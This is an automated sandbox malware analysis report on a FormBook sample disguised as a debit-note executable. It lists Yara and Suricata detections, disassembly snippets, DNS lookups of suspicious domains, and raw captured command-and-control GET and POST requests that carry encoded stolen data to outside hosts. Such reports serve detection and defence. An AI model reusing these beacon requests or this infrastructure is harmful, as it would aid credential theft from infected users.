Windows Analysis Report
debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

AI detected suspicious sample

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4097236613.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4096792766.0000000003740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2059058691.0000000004D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

Joe Sandbox ML: detected

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: xcopy.pdbUGP source: svchost.exe, 00000001.00000003.2026657859.0000000003013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2026718174.000000000302B000.00000004.00000020.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000002.4095627699.0000000000797000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PMZSowQBcVJqD.exe, 00000005.00000000.1982139512.0000000000CDE000.00000002.00000001.01000000.00000005.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2133989943.0000000000CDE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2058786262.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1966811502.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1968342442.0000000003400000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2069920922.000000000320E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.0000000003560000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2071661986.00000000033B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2058786262.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1966811502.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1968342442.0000000003400000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000006.00000003.2069920922.000000000320E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.0000000003560000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2071661986.00000000033B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: xcopy.pdb source: svchost.exe, 00000001.00000003.2026657859.0000000003013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2026718174.000000000302B000.00000004.00000020.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000002.4095627699.0000000000797000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: xcopy.exe, 00000006.00000002.4095507452.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2360502532.000000001584C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: xcopy.exe, 00000006.00000002.4095507452.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2360502532.000000001584C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\xcopy.exe

Code function: 6_2_00A3C330 FindFirstFileW,FindNextFileW,FindClose,

6_2_00A3C330

Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 4x nop then xor eax, eax	6_2_00A29DC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_033504E8
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 4x nop then pop edi	7_2_056595F4
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 4x nop then xor eax, eax	7_2_0564E25F
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 4x nop then pop edi	7_2_05648A2A
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 4x nop then mov ebx, 00000004h	8_2_000002B4556084E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 195.154.200.15:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 195.154.200.15:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49805 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49789 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49789 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49836 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49836 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49870 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49900 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49912 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49912 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49940 -> 104.21.3.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 104.21.3.144:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49978 -> 104.21.3.144:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49978 -> 104.21.3.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49820 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49965 -> 104.21.3.144:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50018 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50008 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50030 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 150.95.254.16:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50034 -> 150.95.254.16:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 150.95.254.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 168.76.221.252:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50038 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 150.95.254.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 217.160.0.111:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 150.95.254.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50042 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 217.160.0.111:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 185.179.189.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 217.160.0.111:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 168.76.221.252:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50042 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50046 -> 217.160.0.111:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50046 -> 217.160.0.111:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50050 -> 168.76.221.252:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50050 -> 168.76.221.252:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 185.179.189.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 168.76.221.252:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.deepfy.xyz

Source: Joe Sandbox View

IP Address: 217.160.0.111 217.160.0.111

Source: Joe Sandbox View	ASN Name: ACPCA ACPCA
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49730

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /rwi3/?Q8r=3l9HWofhi4qI6FgwzBgfqCSqepMbi+x/tP4hcqqML+ok6ico/8tPHaiq8anAIRqTRw/AlsoC6MOKOJSN91dw5wR1aaSWnnHTBS7NSUaA1IBUrmZ191OmHzE=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.budged.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /uq6t/?Q8r=ZmOuW+E1JQv4r3aGEbsQMWywCDirJqa8lSgxGnusS60cRChPvy2rfp72Zk59w6/9xgDV5k8yOfW6UGcYK3LfpsgqcNxelJTnva2v3kAA6k+BaxPzrNAzrWw=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cursosonline.bioConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /fy4q/?Q8r=mcLISvp6nW4sNO0Oj8jOpWhNNbX1eENX6bIi/iiCJdbobbylfQD4XX0OLgusDywc0PIJxHOPAGfsQI2vBEzMGplJEOCqrWIF9aldzRVMXORMZ/L63cm0yJs=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.prediksipreman.fyiConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /vpuy/?Q8r=GohnPojKoDSo26eExaRPtq0fYHz1awKnkuX4rqCOwHJs0Om2tBI/qHVUK+LhjFCYnUGrzAuj4BG5Iu5ezVBqMm60AjojQL4Je3zYgtUuMeqMe2LW7C+ksjQ=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.98yl9900.vipConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /vzdg/?Q8r=KE8APriLyHXVd58o2RVaxaHXOxKH6DBplwKhZxuWS8ol8ZNB+zrcGju15mUNFjZ4/qmrZG+pRN3cP3bWpxBJDHDy3g5/i7RwSLvxhij0g+QyzFB905H5wec=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.mjmegartravel.onlineConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /87jo/?Q8r=ozysDd3vwv9gaS29FRbnc0GmlFkZcaQYkpXnKEUw0wCH0hn9MIemfLYf1abLLDUSAte8bdVQTpE72RtdL6FpCvjERq56vwlcganuPeakPXnenu2oXl0fStc=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.energyparks.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /3ase/?Q8r=f11mnzhDDGBf+/artp+PfsS316rmJteNkA5Z8hOTIieoFxtTQBGeVYPutJ4Jq/YWKuaYmzuYepHFf+3fXfMgZDBF3jtHXko48sZRIiancbFNwMQpED1LC8k=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.electronify.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /4ecw/?Q8r=0dQ8CvJEcf0k7N3KGSlLirxY6r92/jsun5G8F0uxw3yzZhCR3PWiA4isvn4XsmdrPPNvoDvZx6QPnXDC61qvR3DkSSTWPVERcD9g8HOA7TMtamwzCoHCAmc=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.sibeta.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /0by3/?Q8r=efHJA933MNzr/PW0mnuDq9Bq5Tko85ea564Kp9U5FyRJkGEFhbQl4J8Qjgja2f9fM8RihmJcYOokucUKLubMlM0irYAtLesM+0DLZZlGElvWUt69+LazkvU=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.j252mv.siteConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /kz8j/?Q8r=QgKs8ib8pSkW+zKBwipCHX7UMUqMF7yADzXTDGJ0XdB6OCHQraJ+KZU3DxhMouRtg+08egxU0v/OLmtErrB1+9oqLfJkb4rbcOK0NiMrGSL51W8rMrC8dsw=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.dwmdconsulting.llcConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /0zsv/?Q8r=+k4oqFxRNocWibNOARfqv4VMC58QqhlZUZKcqPt4OXzeqjQirtEo6xCQlowbpjBKI3NLMSWGXVvwuRLD6mLhdQvHcmrKXdi5xtD9EO55lWtqmLshJCc1gWo=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.deepfy.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /tc13/?Q8r=SGbT8cdGn4hr6W9IQaErgA0XZ0/ODBbeE+rRSQfNCBVGsaJUOBN6Lk8UowuO+R8+qu85kOdeeMLFTNx1Fuyr7ECi1xcpiA8ny7JQ29NqIXoz/KZuCpX8Llg=&6trpq=anQT3n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.time-change.fyiConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Source: global traffic	HTTP traffic detected: GET /lxjv/?6trpq=anQT3n&Q8r=+K5n/IT0yXRRANeuqn/owCg6I74ZgbMezEFWIjAj36nDkdhnum9kwXyxiYh8DtQScaz4Dnq0yx+OkYvS6b/TqIhsF3CYh8jP4suZ5AZYY+5BPcJw3t1/wxU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.5hdgb2p9a.buzzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13

Source: global traffic	DNS traffic detected: DNS query: www.budged.net
Source: global traffic	DNS traffic detected: DNS query: www.cursosonline.bio
Source: global traffic	DNS traffic detected: DNS query: www.prediksipreman.fyi
Source: global traffic	DNS traffic detected: DNS query: www.98yl9900.vip
Source: global traffic	DNS traffic detected: DNS query: www.mjmegartravel.online
Source: global traffic	DNS traffic detected: DNS query: www.energyparks.net
Source: global traffic	DNS traffic detected: DNS query: www.electronify.shop
Source: global traffic	DNS traffic detected: DNS query: www.sibeta.info
Source: global traffic	DNS traffic detected: DNS query: www.j252mv.site
Source: global traffic	DNS traffic detected: DNS query: www.dwmdconsulting.llc
Source: global traffic	DNS traffic detected: DNS query: www.deepfy.xyz
Source: global traffic	DNS traffic detected: DNS query: www.time-change.fyi
Source: global traffic	DNS traffic detected: DNS query: www.5hdgb2p9a.buzz
Source: global traffic	DNS traffic detected: DNS query: www.jivatop.online

Source: unknown

HTTP traffic detected: POST /uq6t/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.cursosonline.bioOrigin: http://www.cursosonline.bioContent-Length: 200Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Referer: http://www.cursosonline.bio/uq6t/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13Data Raw: 51 38 72 3d 55 6b 6d 4f 56 4a 51 4c 49 51 33 4b 76 6b 6d 61 48 73 45 6d 44 44 72 42 63 47 75 56 4a 64 2f 64 39 33 34 43 4d 30 43 44 51 4e 6f 54 4f 7a 4a 6e 76 56 71 49 58 4b 4f 71 65 6b 39 70 68 5a 62 6c 78 53 69 38 6d 6c 46 4a 5a 76 2b 62 58 41 64 68 42 7a 76 4c 6a 61 55 31 54 63 59 61 6b 61 32 75 76 4b 32 41 36 45 31 62 38 54 54 70 59 67 50 6c 6b 4e 67 58 30 6d 79 4b 2f 39 66 2b 48 48 71 2f 2f 78 37 67 74 6a 7a 56 47 6f 74 5a 5a 53 39 72 4b 73 34 2b 56 41 74 7a 6c 43 45 68 2f 35 6c 37 6b 33 42 76 7a 43 61 4c 55 53 49 6e 75 51 58 37 